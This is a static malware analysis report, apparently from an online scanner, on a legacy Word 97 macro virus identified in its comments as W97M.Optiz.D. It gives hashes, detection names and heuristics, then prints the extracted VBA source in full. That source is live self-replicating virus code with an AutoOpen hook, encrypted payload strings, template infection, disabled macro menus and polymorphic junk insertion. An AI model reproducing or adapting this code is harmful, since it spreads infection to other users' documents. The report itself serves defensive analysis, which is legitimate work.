Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 929f534fb012d3f5…

MALICIOUS

Office (OLE)

47.0 KB Created: 1999-05-31 14:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 04cc387bde3f2ba1531b06aebc0a40bb SHA-1: 35db48bcf50df8e2585eb679da2460b4d8e8c994 SHA-256: 929f534fb012d3f5327dfaf152608d408ccc54709e055bedc8d1cb1591b4ce2d
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, including an AutoOpen subroutine, which is a common technique for executing malicious code automatically. The presence of ClamAV detections like 'Doc.Trojan.Noswan-1' and 'Doc.Trojan.NoClue-1' further confirms its malicious nature. The AutoOpen macro likely attempts to drop a secondary payload, although the specific details are obfuscated within the script.

Heuristics 4

  • ClamAV: Doc.Trojan.Noswan-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Noswan-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15501 bytes
SHA-256: 2dd94accbbfa114799f4ade2a2228da7d581fc59cd0358a01031f199363451b4
Detection
ClamAV: Doc.Trojan.NoClue-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Office_"
Public Const ModulName = "Office_"
Public Active_ As Object
Public Normal_ As Object
Public CodeHost_ As Object
Public Skip As Boolean

Sub AutoOpen()
On Error Resume Next
Drop
End Sub

Sub Drop()
On Error Resume Next
Dim Jack(28) As String

Jack(1) = "l‹=b��Œ�=o‚�’Š‚=k‚•‘"
Jack(2) = "p‚‘=^€‘†“‚|=Z=^€‘†“‚aŒ€’Š‚‹‘Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�"
Jack(3) = "p‚‘=kŒ�Š~‰|=Z=kŒ�Š~‰q‚Š�‰~‘‚Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�"
Jack(4) = "^��‰†€~‘†Œ‹Ka†��‰~–^‰‚�‘�=Z=”�^‰‚�‘�kŒ‹‚"
Jack(5) = "`ŒŠŠ~‹�_~��E?s†‚”?FK`Œ‹‘�Œ‰�ESFKb‹~ ‰‚�=Z=c~‰�‚"
Jack(6) = "`ŒŠŠ~‹�_~��E?cŒ�Š~‘?FK`Œ‹‘�Œ‰�ENOFKb‹~ ‰‚�=Z=c~‰�‚"
Jack(7) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�ENOFKb‹~ ‰‚�=Z=c~‰�‚"
Jack(8) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�ENPFKb‹~ ‰‚�=Z=c~‰�‚"
Jack(9) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�ENQFKb‹~ ‰‚�=Z=c~‰�‚"
Jack(10) = "l�‘†Œ‹�Ks†�’�m�Œ‘‚€‘†Œ‹=Z=c~‰�‚"
Jack(11) = "l�‘†Œ‹�Kp~“‚kŒ�Š~‰m�ŒŠ�‘=Z=c~‰�‚"
Jack(12) = "l�‘†Œ‹�K^‰‰Œ”c~�‘p~“‚=Z=c~‰�‚"
Jack(13) = "a~‘~=Z=?€Wy”†‹VRK�–�?"
Jack(14) = "^��‰†€~‘†Œ‹Ks_bK^€‘†“‚s_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�EjŒ�’‰k~Š‚FKb•�Œ�‘=a~‘~"
Jack(15) = "^€‘†“‚f‹�=Z=c~‰�‚"
Jack(16) = "kŒ�Š~‰f‹�=Z=c~‰�‚"
Jack(17) = "cŒ�=†=Z=N=qŒ=kŒ�Š~‰|K`Œ’‹‘"
Jack(18) = "fƒ=kŒ�Š~‰|E†FKk~Š‚=Z=jŒ�’‰k~Š‚=q…‚‹=kŒ�Š~‰f‹�=Z=q�’‚"
Jack(19) = "k‚•‘"
Jack(20) = "cŒ�=†=Z=N=qŒ=^€‘†“‚|K`Œ’‹‘"
Jack(21) = "fƒ=^€‘†“‚|E†FKk~Š‚=Z=jŒ�’‰k~Š‚=q…‚‹=^€‘†“‚f‹�=Z=q�’‚"
Jack(22) = "k‚•‘"
Jack(23) = "fƒ=kŒ�Š~‰f‹�=Z=c~‰�‚=q…‚‹=kŒ�Š~‰|KfŠ�Œ�‘=a~‘~"
Jack(24) = "fƒ=^€‘†“‚f‹�=Z=c~‰�‚=q…‚‹"
Jack(25) = "^€‘†“‚|KfŠ�Œ�‘=a~‘~"
Jack(26) = "pˆ†�=Z=q�’‚"
Jack(27) = "b‹�=fƒ"
Jack(28) = "fƒ=eŒ’�EkŒ”EFF=Z=f‹‘Eo‹�=G=OQF=q…‚‹=j�„_Œ•=?d�‚‚‘—=‘ŒW?=C=“ `�=C=“ `�=C=?››H=i†‹‚w‚�õ=k‚‘”Œ�ˆ?=C=“ `�=C=?››H=h‹Œ”�‚‘…=C=j‚‘~�…~�‚?=C=“ `�=C=?››H=`‰~’=C=r‰‘†Š~‘‚=`…~Œ�?=C=“ `�=C=?››H=k†„…‘Š~�‚=gŒˆ‚�?I=SQI=?tVTjKl�‘†—=™= –=g~€ˆ=q”Œƒ‰Œ”‚�Li†‹‚w‚�õ=s•=q‚~Š?"

For i = 1 To 28
    ECode = ECode & DeCode(Jack(i))
Next i

Set CodeHost_ = Application.VBE.ActiveVBProject.VBComponents(ModulName).CodeModule

For o = 1 To CodeHost_.CountOfLines
    If Left(CodeHost_.Lines(o, 1), 9) = Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(79) + Chr(112) + Chr(116) + Chr(105) + Chr(122) Then
        TheLine = o + 1
        Exit For
    End If
Next o

CodeHost_.InsertLines TheLine, ECode

Optiz

CodeHost_.DeleteLines TheLine, 29

If Skip = False Then
    NormalTemplate.VBProject.VBComponents(ModulName).CodeModule.DeleteLines TheLine, 29
Else
    ActiveDocument.VBProject.VBComponents(ModulName).CodeModule.DeleteLines TheLine, 29
    ActiveDocument.SaveAs ActiveDocument.FullName
End If

PolySize = Int(Rnd * 10)

For PolyMorphic = 1 To PolySize

    PolyString = ""
    PolyLines = CodeHost_.CountOfLines

    RndLine = Int(Rnd * PolyLines)
    StringSize = Int(Rnd * 39) + 1

    For SomeString = 1 To StringSize
        PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
    Next SomeString
    
    CodeHost_.InsertLines RndLine, "Rem " & PolyString

Next PolyMorphic

End Sub

Sub Optiz()

End Sub

Sub ToolsMacro()
End Sub
Sub ViewCode()
End Sub
Sub ViewVBCode()
End Sub
Sub ToolsCustomize()
End Sub
Sub FileTemplates()
End Sub

Public Function DeCode(Code As String)

    For xy = 1 To Len(Code)
        Ascii = Asc(Mid(Code, xy, 1))
        Change = Ascii - 29
        NewCode = NewCode & Chr(Change)
    Next
    
    DeCode = NewCode & vbCr

End Function

'   W97M.Optiz.D
'   ============

'   Tech uses by Nightmare Joker, thanks!

'    Greetz to:
'    ~~+ LineZerØ
'    ~~+ Nightmare Joker
'    ~~+ Knowdeth
'    ~~+ Clau[UC]
'    ~~+ All austrian vx coders
'    ~~+ VicodinES


' Processing file: /opt/analyzer/scan_staging/e4d43b6d8d3745bcbd31e7e60add2d39.bin
' ===============================================================================
' Mod
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.